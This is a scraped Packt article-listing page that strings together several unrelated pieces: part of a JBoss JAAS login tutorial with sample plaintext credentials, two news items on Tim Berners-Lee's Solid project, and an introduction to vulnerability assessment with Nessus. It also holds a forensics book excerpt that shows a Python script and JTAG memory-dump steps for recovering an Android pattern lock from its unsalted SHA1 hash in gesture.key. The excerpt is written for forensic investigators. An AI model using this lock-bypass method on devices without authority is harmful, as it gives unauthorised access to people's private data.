Go to jboss-5.1.0.GAserver defaultconflogin-config.xml in JBoss. If you look at the file, you can see various configurations for database LDAP and a simple one using the properties file, which I have used in the following code snippet: <application-policy name="other"> <!-- A simple server login module, which can be used when the number of users is relatively small. It uses two properties files: users.properties, which holds users (key) and their password (value). roles.properties, which holds users (key) and a commaseparated list of their roles (value). The unauthenticatedIdentity property defines the name of the principal that will be used when a null username and password are presented as is the case for an unauthenticated web client or MDB. If you want to allow such users to be authenticated add the property, e.g., unauthenticatedIdentity="nobody" --> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRoles LoginModule" flag="required"/> <module-option name="usersProperties"> users.properties</module-option> <module-option name="rolesProperties"> roles.properties</module-option> <module-option name="unauthenticatedIdentity"> nobody</module-option> </authentication> </application-policy> Create the users.properties file in the same folder. The following is the Users. properties file with username mapped with role. User.properties anjana=anjana123 roles.properties anjana=role1 Restart the server. How it works... JAAS consists of a set of interfaces to handle the authentication process. They are: The CallbackHandler and Callback interfaces The LoginModule interface LoginContext The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific. Each container will have its own implementation, here we are using JBoss application server to demonstrate JAAS. In my previous example, I have explicitly called JASS interfaces. UserCredentialHandler implements the CallbackHandler interfaces. So, CallbackHandlers are storage spaces for the user credentials and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to LoginModule interfaces for authentication: CallbackHandler myHandler = new UserCredentialHandler(request. getParameter("j_username"),request.getParameter("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login() The web.xml file defines the security mechanisms and also points us to the protected resources in our application. The following screenshot shows a failed authentication window: The following screenshot shows a successful authentication window: Summary We introduced the JAAs-based mechanism of applying security to authenticate and authorize the users to the application Resources for Article: Further resources on this subject: Spring Security 3: Tips and Tricks [Article] Spring Security: Configuring Secure Passwords [Article] Migration to Spring Security 3 [Article]
Read more
  • 0
  • 0
  • 15486

article-image-sir-tim-berners-lee-on-digital-ethics-and-socio-technical-systems-at-icdppc-2018
Sugandha Lahoti
25 Oct 2018
4 min read
Save for later

Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018

Sugandha Lahoti
25 Oct 2018
4 min read
At the ongoing 40th ICDPPC, International Conference of Data Protection and Privacy Commissioners conference, Sir Tim Berners-Lee spoke on ethics and the Internet. The ICDPPC conference which is taking place in Brussels this week brings together an international audience on digital ethics, a topic the European Data Protection Supervisor initiated in 2015. Some high profile speakers and their presentations include Giovanni Buttarelli, European Data Protection Supervisor on ‘Choose Humanity: Putting Dignity back into Digital’; Video interview with Guido Raimondi, President of the European Court of Human Rights; Tim Cook, CEO Apple on personal data and user privacy; ‘What is Ethics?’ by Anita Allen, Professor of Law and Professor of Philosophy, University of Pennsylvania among others. Per Techcrunch, Tim Berners-Lee has urged tech industries and experts to pay continuous attention to the world their software is consuming as they go about connecting humanity through technology. “Ethics, like technology, is design. As we’re designing the system, we’re designing society. Ethical rules that we choose to put in that design [impact the society]… Nothing is self-evident. Everything has to be put out there as something that we think will be a good idea as a component of our society.” he told the delegates present at the conference. He also described digital platforms as “socio-technical systems” — meaning “it’s not just about the technology when you click on the link it is about the motivation someone has, to make such a great thing and get excited just knowing that other people are reading the things that they have written”. “We must consciously decide on both of these, both the social side and the technical side,” he said. “The tech platforms are anthropogenic. They’re made by people. They’re coded by people. And the people who code them are constantly trying to figure out how to make them better.” According to Techcrunch, he also touched on the Cambridge Analytica data misuse scandal as an illustration of how sociotechnical systems are exploding simple notions of individual rights. “You data is being taken and mixed with that of millions of other people, billions of other people in fact, and then used to manipulate everybody. Privacy is not just about not wanting your own data to be exposed — it’s not just not wanting the pictures you took of yourself to be distributed publicly. But that is important too.” He also revealed new plans about his startup, Inrupt, which was launched last month to change the web for the better. His major goal with Inrupt is to decentralize the web and to get rid of gigantic tech monopolies’ (Facebook, Google, Amazon, etc) stronghold over user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. He explained that his platform can put people in control of their own data. The app, he explains, asks you where you want to put your data. So you can run your photo app or take pictures on your phone and say I want to store them on Dropbox, and I will store them on my own home computer. And it does this with a new technology which provides interoperability between any app and any store.” “The platform turns the privacy world upside down — or, I should say, it turns the privacy world right side up. You are in control of you data life… Wherever you store it you can control and get access to it.” He concluded saying that “We have to get commitments from companies to make their platforms constructive and we have to get commitments from governments to look at whenever they see that a new technology allows people to be taken advantage of, allows a new form of crime to get onto it by producing new forms of the law. And to make sure that the policies that they do are thought about in respect to every new technology as they come out.” The day before yesterday, The Public Voice Coalition, an organization that promotes public participation in decisions regarding the future of the Internet, came out with guidelines for AI, namely, Universal Guidelines on Artificial Intelligence at ICDPPC. Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data” EPIC’s Public Voice Coalition announces Universal Guidelines for Artificial Intelligence (UGAI) at ICDPPC 2018 California’s tough net neutrality bill passes state assembly vote.
Read more
  • 0
  • 0
  • 14996

Packt
15 Oct 2015
7 min read
Save for later

Mobile Phone Forensics: A First Step into Android Forensics

Packt
15 Oct 2015
7 min read
In this article by Michael Spreitzenbarth and Johann Uhrmann, authors of the book Mastering Python Forensics, we will see that even though the forensic analysis of the standard computer hardware—such as hard disks—has developed into a stable discipline with a lot of reference work, the techniques used to analyze the non-standard hardware or transient evidence are debatable. Despite their increasing role in digital investigations, smartphones are yet to be considered non-standard due of their heterogeneity. In all investigations, it is necessary to follow the basic forensic principles. The two main principles are as follows: Greatest care must be taken to ensure that the evidence is manipulated or changed as little as possible. The course of a digital investigation must be understandable and open to scrutiny. At best, the results of the investigation must be reproducible by independent investigators. The first principle is a challenge while the setting smartphones as most of them employ specific operating systems and hardware protection methods that prevent unrestricted access to the data on the system. The preservation of the data from the hard disks is, in most cases, a simple and well-known procedure. An investigator removes the hard disk from the computer or notebook, connects it to his workstation with the help of a write blocker (for example, Tableau's TK35) and starts analyzing it with well-known and certified software solutions. When this is compared to the smartphone world, it becomes clear that here is no such procedure. Nearly, every smartphone has its own way to build its storage; however, the investigators need their own way to get the storage dump on each smartphone. While it is difficult to get the data from a smartphone, one can get much more data with reference to the diversity of the data. Smartphones store, besides the usual data (for example, pictures and documents), the data such as GPS coordinates or the position of a mobile cell that the smartphone was connected to before it was switched off. Considering the resulting opportunities, it turns out that it is worth the extra expense for an investigator. In the following sections, we will show you how to start such analysis on an Android phone. Circumventing the screen lock It is always a good point to start the analysis by circumventing the screen lock. As you may know, it is very easy to get around the pattern lock on an Android smartphone. In this brief article, we will describe the following two ways to get around it: On a rooted smartphone With the help of the JTAG interface Some background information The pattern lock is entered by the users on joining the points on a 3×3 matrix in their chosen order. Since Android 2.3.3, this pattern involves a minimum of 4 points (on older Android versions, the minimum was 3 points) and each point can only be used once. The points of the matrix are registered in a numbered order starting from 0 in the upper left corner and ending with 8 in the bottom right corner. So the pattern of the lock screen in the following figure would be 0 – 3 – 6 – 7 – 8: Android stores this pattern in a special file called gesture.key in the /data/system/ directory. As storing the pattern in plain text is not safe, Android only stores an unsalted SHA1-hashsum of this pattern (refer to the following code snippet). Accordingly, our pattern is stored as the following hashsum: c8c0b24a15dc8bbfd411427973574695230458f0 The code snippet is as follows: private static byte[] patternToHash(List pattern) { if (pattern == null) { return null; } final int patternSize = pattern.size(); byte[] res = new byte[patternSize]; for (int i = 0; i &lt; patternSize; i++) { LockPatternView.Cell cell = pattern.get(i); res[i] = (byte) (cell.getRow() * 3 + cell.getColumn()); } try { MessageDigest md = MessageDigest.getInstance("SHA-1"); byte[] hash = md.digest(res); return hash; } catch (NoSuchAlgorithmException nsa) { return res; } } Due to the fact that the pattern has a finite and a very small number of possible combinations, the use of an unsalted hash isn't very safe. It is possible to generate a dictionary (rainbow table) with all possible hashes and compare the stored hash with this dictionary within a few seconds. To ensure some more safety, Android stores the gesture.key file in a restricted area of the filesystem, which cannot be accessed by a normal user. If you have to get around it, there are two ways available to choose from. On a rooted smartphone If you are dealing with a rooted smartphone and the USB debugging is enabled, cracking the pattern lock is quite easy. You just have to dump the /data/system/gesture.key file and compare the bytes of this file with your dictionary. These steps can be automated with the help of the following Python script: #!/usr/bin/python # import hashlib, sqlite3 from binascii import hexlify SQLITE_DB = "GestureRainbowTable.db" def crack(backup_dir): # dumping the system file containing the hash print "Dumping gesture.key ..." saltdb = subprocess.Popen(['adb', 'pull', '/data/system/gesture.key', backup_dir], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) gesturehash = open(backup_dir + "/gesture.key", "rb").readline() lookuphash = hexlify(gesturehash).decode() print "HASH: \033[0;32m" + lookuphash + "\033[m" conn = sqlite3.connect(SQLITE_DB) cur = conn.cursor() cur.execute("SELECT pattern FROM RainbowTable WHERE hash = ?", (lookuphash,)) gesture = cur.fetchone()[0] return gesture if __name__ == '__main__': # check if device is connected and adb is running as root if subprocess.Popen(['adb', 'get-state'], stdout=subprocess.PIPE).communicate(0)[0].split("\n")[0] == "unknown": print "no device connected - exiting..." sys.exit(2) # starting to create the output directory and the crack file used for hashcat backup_dir = sys.argv[1] try: os.stat(backup_dir) except: os.mkdir(backup_dir) gesture = crack(backup_dir) print "Screenlock Gesture: \033[0;32m" + gesture + "\033[m"" With the help of the JTAG Interface If you are dealing with a stock or at least an unrooted smartphone, the whole process is a bit more complicated. First of all, you need special hardware such as a Riff-Box and an JIG adapter or some soldering skills. After you have gained a physical dump of the complete memory chip, the chase for the pattern lock can start. In our experiment, we used HTC Wildfire with a custom ROM and Android 2.3.3 flashed on it and the pattern lock that we just saw in this article. After looking at the dump, we noticed that every chunk has an exact size of 2048 bytes. Since we know that our gesture.key file has 20 bytes of data (SHA1-hashsum), we searched for this combination of bytes and noticed that there is one chunk starting with these 20 bytes, followed by 2012 bytes of zeroes and 16 random bytes (this seems to be some meta file system information). We did a similar search on several other smartphone dumps (mainly older Android versions on the same phone) and it turned out that this method is the easiest way to get the pattern lock without being root. In other words, we do the following: Try to get a physical dump of the complete memory Search for a chunk with the size of 2048 bytes, starting with 20 bytes random, followed by 2012 bytes zeroes and 16 bytes random Extract the 20 bytes random at the beginning of the chunk Compare these 20 bytes with your dictionary Type in the corresponding pattern on the smartphone Summary In this article, we demonstrated how to get around the screen lock on an Android smartphone if the user has chosen to use a pattern to protect the smartphone against unauthorized access. Circumventing this protection can help the investigators during the analysis of a smartphone in question, as they are now able to navigate through the apps and smartphone UI in order to search for interesting sources or to prove the findings. This step is only the first part of an investigation, if you would like to get more details about further steps and investigations on the different systems, the book Mastering Python Forensics could be a great place to start. Resources for Article: Further resources on this subject: Evidence Acquisition and Analysis from iCloud [article] BackTrack Forensics [article] Introduction to Mobile Forensics [article]
Read more
  • 0
  • 0
  • 14968
article-image-tim-berners-lee-plans-to-decentralize-the-web-with-solid-an-open-source-project-for-personal-empowerment-through-data
Natasha Mathur
01 Oct 2018
4 min read
Save for later

Tim Berners-Lee plans to decentralize the web with ‘Solid’, an open-source project for “personal empowerment through data”

Natasha Mathur
01 Oct 2018
4 min read
Tim Berners-Lee, the creator of the world wide web, revealed his plans of changing the web for the better, as he launched his new startup, Inrupt, last Friday. His major goal with Inrupt is to decentralize the web and get rid of the tech giant’s monopolies (Facebook, Google, Amazon, etc) on the user data. He hopes to achieve this with Inrupt’s new open source-project, Solid, a platform built using the existing web format. Tim has been working on Solid over the recent years with collaboration from people in MIT. “I’ve always believed the web is for everyone. That's why I and others fight fiercely to protect it. The changes we’ve managed to bring have created a better and more connected world. But for all the good we’ve achieved, the web has evolved into an engine of inequity and division; swayed by powerful forces who use it for their own agendas”, said Tim on his announcement blog post. Solid to provide users with more control over their data Solid will be working on completely changing the current web model that involves users handing over their personal data to digital giants “in exchange for perceived value”. “Solid is how we evolve the web in order to restore balance - by giving every one of us complete control over data, personal or not, in a revolutionary way,” says Tim. Solid offers every user a choice regarding where data gets stored, which specific people and groups can access the select elements in a data, and which apps you use. It will enable you, your family and colleagues, to link and share the data with anyone. Also, people can look at the same data with different apps at the same time, with Solid. Solid technology is built on existing web formats, and developers will have to integrate Solid into their apps and sites. Solid hopes to empower individuals, developers and businesses across the globe with totally new ways to build and find innovative and trusted applications. “I see multiple market possibilities, including Solid apps and Solid data storage”, adds Tim. According to Katrina Brooker, writer at FastCompany, “every bit of data you create or add-on Solid exists within a Solid pod. Solid Pod is a personal online data store. These pods provide Solid users with control over their applications and information on the web. Whoever uses the Solid Platform gets a Solid identity and Solid pod”. This is how Solid will enforce “personal empowerment through data” by helping users take back the power of web from gigantic corporations. Additionally, Tim told Brooker that he’s currently working on a way to create a decentralized version of Alexa, Amazon’s popular digital assistant. “He calls it Charlie. Unlike with Alexa, on Charlie people would own all their data. That means they could trust Charlie with, for example, health records, children’s school events, or financial records. That is the kind of machine Berners-Lee hopes will spring up all over Solid to flip the power dynamics of the web from corporations to individuals”, writes Brooker. Given the recent Facebook security breach that compromised 50M user accounts, and past data misuse scandals such as the Cambridge Analytica scandal, Solid seems to be an angel in disguise that will transfer the data control power into the hands of users. However, there’s no guarantee if Solid will be widely accepted by everyone as a lot of companies on the web are extremely sensitive when it comes to their data. They might not be interested in losing control over that data. But, it’s definitely going to take us one step ahead, to a more free and open Internet. Tim has taken a sabbatical from MIT and has reduced his day-to-day involvement with the World Wide Web Consortium (W3C) to work full time on Inrupt. “It is going to take a lot of effort to build the new Solid platform and drive broad adoption but I think we have enough energy to take the world to a new tipping point,” says Tim. For more coverage on this news, check out the official Inrupt blog.
Read more
  • 0
  • 0
  • 14867

article-image-fundamentals
Packt
20 Jan 2014
4 min read
Save for later

Fundamentals

Packt
20 Jan 2014
4 min read
(For more resources related to this topic, see here.) Vulnerability Assessment and Penetration Testing Vulnerability Assessment ( VA) and Penetrating Testing ( PT or PenTest ) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them with making timely decisions to protect themselves from these vulnerabilities. Vulnerability Assessments and PenTests using Nessus. Nessus is a widely recognized tool for such purposes. This section introduces you to basic terminology with reference to these two types of assessments. Vulnerability in terms of IT systems can be defined as potential weaknesses in system/infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system. Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and published vulnerabilities on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kind of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool. Penetration Testing has an additional step for vulnerability assessment, exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities, and as a next step, will try to penetrate the system by exploiting the identified vulnerabilities. Need for Vulnerability Assessment It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits for conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding. Risk prevention Vulnerability Assessment uncovers the loopholes/gaps/vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance to the different compliance and regulatory requirements since you know your vulnerabilities already. Awareness of such vulnerabilities in time can help an organization to fi x them and mitigate the risks involved in advance before they get exploited. The risks of getting a vulnerability exploited include: Financial loss due to vulnerability exploits Organization reputation Data theft Confidentiality compromise Integrity compromise Availability compromise Compliance requirements The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors such as banking and telecom. The life cycles of Vulnerability Assessment and Penetration Testing This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle: Scoping Information gathering Vulnerability scanning False positive analysis Vulnerability exploitation (Penetration Testing) Report generation The following figure illustrates the different sequential stages recommended to follow for a Vulnerability Assessment or Penetration Testing: Summary In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus. Resources for Article: Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [Article] Penetration Testing and Setup [Article] Web app penetration testing in Kali [Article]
Read more
  • 0
  • 0
  • 14737
Modal Close icon
Modal Close icon